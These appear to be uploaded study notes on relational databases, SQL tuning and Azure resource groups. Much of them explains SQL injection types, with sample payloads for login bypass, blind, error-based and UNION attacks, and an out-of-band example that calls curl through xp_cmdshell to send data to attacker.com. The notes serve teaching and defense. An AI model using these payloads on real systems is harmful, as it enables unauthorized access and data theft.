Database+Sql inj

The document provides an overview of databases, specifically relational databases and their management systems (RDBMS), along with SQL as a language for data manipulation. It discusses database security, optimization, and tuning, highlighting techniques to prevent SQL injection attacks and improve database performance. Additionally, it covers various types of SQL injection attacks and their implications, as well as the structure and purpose of Azure subscriptions and resource groups.

Uploaded by appfacility
Copyright © All Rights Reserved

Database

A database is a repository, where one or more users can save, update and retrieve
information according to their requirements.

Relational database
A relational database (RDB) is a way of structuring information in tables, rows,
and columns. An RDB has the ability to establish links, or relationships, between
information by joining tables, which makes it easy to understand and gain insights
about the relationship between various data points.

A relational database is a way to store and access data with pre-defined
relationships.

RDBMS
A relational database management system is a software layer of tools and services
that manages relational tables.

SQL
Structured Query Language is a powerful and popular language for manipulating data
in relational databases.

Database Security
Users and Permissions
SQL Injection Prevention
Encryption

SQL injection cheat sheets

slides.com/christophe-cybr/sql-explained
Getting started finding a vulnerable parameter:
https://github.com/AdmiralGaust/SQL-Injection-cheat-sheet
Master list:
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
General list:
https://portswigger.net/web-security/sql-injection/cheat-sheet
UNION attacks:
https://portswigger.net/web-security/sql-injection/union-attacks
Info gathering:
https://portswigger.net/web-security/sql-injection/examining-the-database
Blind injections:
https://portswigger.net/web-security/sql-injection/blind
General SQL tips & tricks:
https://sqlzoo.net/
Juice Shop hints:
https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/part2/injection.html

Database Optimization
Database optimization generally refers to the process of designing and structuring
a database to ensure it operates efficiently and effectively from the start. It
focuses on:

Schema Design: Creating a database schema that avoids redundancy and ensures data
integrity. This involves normalization (organizing data to reduce redundancy) and
choosing appropriate data types.

Indexing: Deciding which columns to index to speed up query performance. Proper
indexing helps in retrieving data quickly and efficiently.

Data Modeling: Designing the database structure and relationships between tables to
optimize performance and scalability.

Choosing Storage: Selecting the appropriate storage engines or formats based on the
needs of the application (e.g., InnoDB vs. MyISAM in MySQL).

Database Tuning
Database tuning involves adjusting and configuring the database and its environment
to improve performance. This is more about fine-tuning existing databases and
includes:

Query Optimization: Analyzing and modifying queries to run more efficiently. This
may involve rewriting queries, using better indexing strategies, or avoiding
complex joins and subqueries.

Configuration Settings: Adjusting database server settings (such as buffer sizes,
cache configurations, and connection limits) to better match the workload and
hardware.

Resource Allocation: Managing and allocating resources like CPU, memory, and disk
I/O to ensure the database performs optimally under various loads.

Monitoring and Profiling: Continuously monitoring database performance metrics and
using profiling tools to identify bottlenecks and areas for improvement.

Maintaining Statistics: Keeping statistics up-to-date for the query optimizer to
make informed decisions about query execution plans.

Summary
Database Optimization is about designing and setting up the database structure and
schema to ensure efficient performance from the start.
Database Tuning is about adjusting and configuring the database and its environment
to enhance performance based on current usage patterns and workloads.

1. Classic SQL Injection

Classic SQL Injection occurs when an attacker inserts or "injects" malicious SQL
code into a query. This is typically achieved through input fields like search
boxes or login forms.

Example: If a login form uses a query like:

SELECT * FROM Users WHERE Username = 'user_input' AND Password = 'password_input';

An attacker might input ' OR '1'='1' for both fields, potentially allowing
unauthorized access.
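As an added illustration (not code from the original notes), the login query above built two ways in Python with sqlite3 against a constructed in-memory Users table: concatenated as in the text, and parameterized. The payload ' OR '1'='1 (the query template supplies the trailing quote) matches every row in the first form and no row in the second; the table, user names and passwords are invented sample data.

```python
import sqlite3

# Constructed sample data; real systems store password hashes, not plaintext.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    # The pattern from the text: user input is spliced into the SQL string, so
    # quotes in the input change the grammar of the statement.
    query = ("SELECT * FROM Users WHERE Username = '" + username +
             "' AND Password = '" + password + "';")
    # Returns the usernames the query matched (empty list = login refused).
    return [row[0] for row in conn.execute(query)]

def login_safe(conn, username, password):
    # Parameterized query: the driver binds the values separately, so the same
    # input is compared as data and can never become SQL.
    rows = conn.execute(
        "SELECT * FROM Users WHERE Username = ? AND Password = ?",
        (username, password))
    return [row[0] for row in rows]

# Same payload as in the text, used for both fields. Concatenated it yields:
# ... WHERE Username = '' OR '1'='1' AND Password = '' OR '1'='1';
# which is true for every row because AND binds tighter than OR.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, PAYLOAD))  # ['alice', 'bob']
    print("safe:      ", login_safe(db, PAYLOAD, PAYLOAD))        # []
```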

2. Blind SQL Injection

Blind SQL Injection is a type where the attacker does not receive error messages or
direct feedback from the application. Instead, they infer information based on the
application's behavior.

Types of Blind SQL Injection:

Boolean-Based Blind SQL Injection: The attacker sends queries that ask the database
to return true or false based on certain conditions. For example, checking if the
first letter of the username is 'A':

SELECT * FROM Users WHERE Username = 'user_input' AND 'A' = SUBSTRING(Username, 1, 1);

The application's response will reveal if the condition is true or false.

Time-Based Blind SQL Injection: The attacker sends queries that cause the database
to wait for a specified period before responding. For example:

SELECT * FROM Users WHERE Username = 'user_input' AND IF(1=1, SLEEP(5), 0);

The delay in the application's response indicates whether the condition was true.

3. Error-Based SQL Injection

Error-Based SQL Injection exploits error messages returned by the database server.
By causing errors in the SQL query, attackers can gather information about the
database structure and content.

Example: If the database returns an error message that includes the structure of
the database, attackers can use this information to craft further attacks:

SELECT * FROM Users WHERE Username = 'user_input' AND 1=CONVERT(int, 'string');

This might produce an error revealing details about the database schema.

4. Union-Based SQL Injection

Union-Based SQL Injection uses the UNION SQL operator to combine the results of the
original query with results from one or more additional queries. This can be used
to extract data from other tables.

Example: Suppose the original query is:

SELECT Name, Age FROM Users WHERE ID = 'user_input';

An attacker might inject:

' UNION SELECT username, password FROM Admins--

This could combine the results of the original query with data from the Admins
table.

5. Out-of-Band SQL Injection

Out-of-Band SQL Injection is used when the attacker cannot use the same channel for
sending data and receiving results. Instead, they use an out-of-band channel, such
as making the database server perform actions like sending DNS requests or HTTP
requests to the attacker's server.

Example: An attacker might inject:

SELECT * FROM Users WHERE Username = 'user_input'; EXEC xp_cmdshell('curl http://attacker.com/collect?data=' + @@version);

If the server supports xp_cmdshell, it could make an HTTP request to the attacker's
server, potentially exfiltrating data.

6. Second-Order SQL Injection

Second-Order SQL Injection occurs when the malicious input is stored by the
application and later used in a SQL query. This is a form of SQL injection where
the attack does not immediately manifest but instead triggers when the stored input
is later retrieved and processed.

Example: An attacker might input a malicious payload into a profile field. The
payload might not cause an issue initially but could lead to an attack when the
profile information is later used in a query.
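The profile-field scenario above, as an added example in Python with sqlite3 (not code from the original notes): registration stores the username with a parameterized INSERT, so the payload sits harmlessly in the table; a later lookup that concatenates the stored username into a query is the second-order injection point, and the same lookup done with a bound parameter is not. The Profiles table, e-mail addresses and function names are constructed for the example; the payload is the ' OR '1'='1 string used in section 1.

```python
import sqlite3

# Constructed sample schema: a profile field stored once and queried later.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Profiles (Username TEXT, Email TEXT)")
    conn.executemany("INSERT INTO Profiles VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return conn

def register(conn, username, email):
    # First use of the input: bound parameters, so the payload is stored as-is
    # and nothing bad happens yet. Escaping here would not help later either.
    conn.execute("INSERT INTO Profiles VALUES (?, ?)", (username, email))

def stored_username(conn, email):
    # Later, the application re-reads the profile and treats it as trusted data.
    return conn.execute("SELECT Username FROM Profiles WHERE Email = ?",
                        (email,)).fetchone()[0]

def emails_for_vulnerable(conn, username):
    # Second use: the stored value is concatenated into SQL. With the payload
    # the statement becomes ... WHERE Username = '' OR '1'='1' and returns
    # every profile's e-mail instead of one.
    query = "SELECT Email FROM Profiles WHERE Username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]

def emails_for_safe(conn, username):
    # Bind the value at every point of use, not only at the point of entry.
    return [row[0] for row in conn.execute(
        "SELECT Email FROM Profiles WHERE Username = ?", (username,))]

PAYLOAD = "' OR '1'='1"

def demo():
    db = make_db()
    register(db, PAYLOAD, "mallory@example.test")   # stored without incident
    name = stored_username(db, "mallory@example.test")
    return emails_for_vulnerable(db, name), emails_for_safe(db, name)

if __name__ == "__main__":
    leaked, expected = demo()
    print("concatenated lookup:", leaked)    # all three addresses
    print("parameterized lookup:", expected) # ['mallory@example.test']
```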

Senior SQL Server Developer with 10+ years of experience in professional
application and database development, with thorough knowledge of the different
phases of the software development lifecycle including analysis, design,
development, documentation, testing, deployment and system support. Hands-on
experience of designing relational databases, ensuring data integrity,
normalization and security.

Test (imsami/Test)    SQL database      7 minutes ago
DBData                Resource group    8 minutes ago
imsami                SQL server        47 minutes ago
Azure subscription 1

Subscription
------------------
A subscription in Azure is a container that holds a collection of connected
business or technical resources. The resources are used and billed as a group.
Multiple subscriptions with various access management policies and invoicing
procedures can be added to an Azure account.

Resource group
------------------
A resource group is a container that holds related resources for an Azure solution.
The resource group can include all the resources for the solution, or only those
resources that you want to manage as a group.
